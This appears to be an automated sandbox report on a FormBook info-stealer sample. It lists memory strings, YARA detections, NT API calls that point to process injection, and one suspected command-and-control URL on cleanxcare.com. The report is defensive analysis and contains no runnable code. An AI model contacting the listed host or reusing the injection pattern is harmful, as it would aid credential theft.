          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: control.exe, 00000007.00000002.917583197.0000000005212000.00000004.00000001.sdmpString found in binary or memory: https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004181B0 NtCreateFile,2_2_004181B0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00418260 NtReadFile,2_2_00418260
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004182E0 NtClose,2_2_004182E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,2_2_00418390
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004182AC NtReadFile,2_2_004182AC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041838B NtAllocateVirtualMemory,2_2_0041838B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01519910
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015199A0 NtCreateSection,LdrInitializeThunk,2_2_015199A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519840 NtDelayExecution,LdrInitializeThunk,2_2_01519840
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01519860
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015198F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_015198F0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A50 NtCreateFile,LdrInitializeThunk,2_2_01519A50
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01519A00
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A20 NtResumeThread,LdrInitializeThunk,2_2_01519A20
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519540 NtReadFile,LdrInitializeThunk,2_2_01519540
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015195D0 NtClose,LdrInitializeThunk,2_2_015195D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519710 NtQueryInformationToken,LdrInitializeThunk,2_2_01519710
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519FE0 NtCreateMutant,LdrInitializeThunk,2_2_01519FE0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519780 NtMapViewOfSection,LdrInitializeThunk,2_2_01519780
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015197A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_015197A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01519660
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015196E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_015196E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519950 NtQueueApcThread,2_2_01519950
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015199D0 NtCreateProcessEx,2_2_015199D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151B040 NtSuspendThread,2_2_0151B040
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519820 NtEnumerateKey,2_2_01519820
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015198A0 NtWriteVirtualMemory,2_2_015198A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519B00 NtSetValueKey,2_2_01519B00
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A3B0 NtGetContextThread,2_2_0151A3B0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A10 NtQuerySection,2_2_01519A10
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A80 NtOpenDirectoryObject,2_2_01519A80
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519560 NtWriteFile,2_2_01519560
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151AD30 NtSetContextThread,2_2_0151AD30
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519520 NtWaitForSingleObject,2_2_01519520
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015195F0 NtQueryInformationFile,2_2_015195F0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A770 NtOpenThread,2_2_0151A770
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519770 NtSetInformationFile,2_2_01519770
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519760 NtOpenProcess,2_2_01519760
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151A710 NtOpenProcessToken,2_2_0151A710
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519730 NtQueryVirtualMemory,2_2_01519730
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519650 NtQueryValueKey,2_2_01519650
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519670 NtQueryInformationProcess,2_2_01519670
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519610 NtEnumerateValueKey,2_2_01519610
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015196D0 NtCreateKey,2_2_015196D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04BC9860
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9840 NtDelayExecution,LdrInitializeThunk,7_2_04BC9840
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC99A0 NtCreateSection,LdrInitializeThunk,7_2_04BC99A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC95D0 NtClose,LdrInitializeThunk,7_2_04BC95D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04BC9910
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9540 NtReadFile,LdrInitializeThunk,7_2_04BC9540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04BC96E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC96D0 NtCreateKey,LdrInitializeThunk,7_2_04BC96D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04BC9660
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A50 NtCreateFile,LdrInitializeThunk,7_2_04BC9A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9650 NtQueryValueKey,LdrInitializeThunk,7_2_04BC9650
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9780 NtMapViewOfSection,LdrInitializeThunk,7_2_04BC9780
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9FE0 NtCreateMutant,LdrInitializeThunk,7_2_04BC9FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9710 NtQueryInformationToken,LdrInitializeThunk,7_2_04BC9710
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC98A0 NtWriteVirtualMemory,7_2_04BC98A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC98F0 NtReadVirtualMemory,7_2_04BC98F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9820 NtEnumerateKey,7_2_04BC9820
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCB040 NtSuspendThread,7_2_04BCB040
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC95F0 NtQueryInformationFile,7_2_04BC95F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC99D0 NtCreateProcessEx,7_2_04BC99D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCAD30 NtSetContextThread,7_2_04BCAD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9520 NtWaitForSingleObject,7_2_04BC9520
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9560 NtWriteFile,7_2_04BC9560
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9950 NtQueueApcThread,7_2_04BC9950
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A80 NtOpenDirectoryObject,7_2_04BC9A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A20 NtResumeThread,7_2_04BC9A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9610 NtEnumerateValueKey,7_2_04BC9610
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A10 NtQuerySection,7_2_04BC9A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9A00 NtProtectVirtualMemory,7_2_04BC9A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9670 NtQueryInformationProcess,7_2_04BC9670
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA3B0 NtGetContextThread,7_2_04BCA3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC97A0 NtUnmapViewOfSection,7_2_04BC97A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9730 NtQueryVirtualMemory,7_2_04BC9730
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA710 NtOpenProcessToken,7_2_04BCA710
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9B00 NtSetValueKey,7_2_04BC9B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9770 NtSetInformationFile,7_2_04BC9770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BCA770 NtOpenThread,7_2_04BCA770
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC9760 NtOpenProcess,7_2_04BC9760
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009481B0 NtCreateFile,7_2_009481B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009482E0 NtClose,7_2_009482E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00948260 NtReadFile,7_2_00948260
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00948390 NtAllocateVirtualMemory,7_2_00948390
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_009482AC NtReadFile,7_2_009482AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094838B NtAllocateVirtualMemory,7_2_0094838B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_00ECB7D50_2_00ECB7D5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01870D800_2_01870D80
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01B3B2640_2_01B3B264
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01B3DF500_2_01B3DF50
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01B3C2B00_2_01B3C2B0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_01B399900_2_01B39990
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_0581D0C00_2_0581D0C0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_058121600_2_05812160
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_058121700_2_05812170
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_0581D0B00_2_0581D0B0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_058123B10_2_058123B1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_058123C00_2_058123C0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_00ECC9150_2_00ECC915
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B8B12_2_0041B8B1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B9632_2_0041B963
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00408C4B2_2_00408C4B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00408C502_2_00408C50
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B4932_2_0041B493
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B4962_2_0041B496
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041C5392_2_0041C539
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00402D892_2_00402D89
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041CE852_2_0041CE85
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041BF122_2_0041BF12
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041C7952_2_0041C795
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00A5B7D52_2_00A5B7D5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DF9002_2_014DF900
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F41202_2_014F4120
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015910022_2_01591002
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015AE8242_2_015AE824
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A28EC2_2_015A28EC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB0902_2_014EB090
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A02_2_015020A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A20A82_2_015A20A8
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAB402_2_014FAB40
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A2B282_2_015A2B28
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015903DA2_2_015903DA
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159DBD22_2_0159DBD2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150EBB02_2_0150EBB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158FA2B2_2_0158FA2B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A22AE2_2_015A22AE
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A1D552_2_015A1D55
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A2D072_2_015A2D07
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D0D202_2_014D0D20
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A25DD2_2_015A25DD
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014ED5E02_2_014ED5E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015025812_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159D4662_2_0159D466
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E841F2_2_014E841F
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015ADFCE2_2_015ADFCE
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A1FF12_2_015A1FF1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159D6162_2_0159D616
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F6E302_2_014F6E30
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A2EF72_2_015A2EF7
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00A5C9152_2_00A5C915
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A07_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B0907_2_04B9B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C520A87_2_04C520A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9841F7_2_04B9841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C410027_2_04C41002
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB25817_2_04BB2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9D5E07_2_04B9D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C51D557_2_04C51D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B80D207_2_04B80D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA41207_2_04BA4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8F9007_2_04B8F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C52D077_2_04C52D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C52EF77_2_04C52EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C522AE7_2_04C522AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA6E307_2_04BA6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBEBB07_2_04BBEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C51FF17_2_04C51FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C52B287_2_04C52B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B8B17_2_0094B8B1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B9547_2_0094B954
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B4967_2_0094B496
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B4937_2_0094B493
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00938C507_2_00938C50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00938C4B7_2_00938C4B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00932D907_2_00932D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00932D897_2_00932D89
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094C5397_2_0094C539
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094CE857_2_0094CE85
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094C7957_2_0094C795
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00932FB07_2_00932FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094BF127_2_0094BF12
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04B8B150 appears 35 times
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: String function: 014DB150 appears 48 times
          Source: lTAPQJikGw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilename vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000000.00000002.656995303.0000000000EC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilename vs lTAPQJikGw.exe
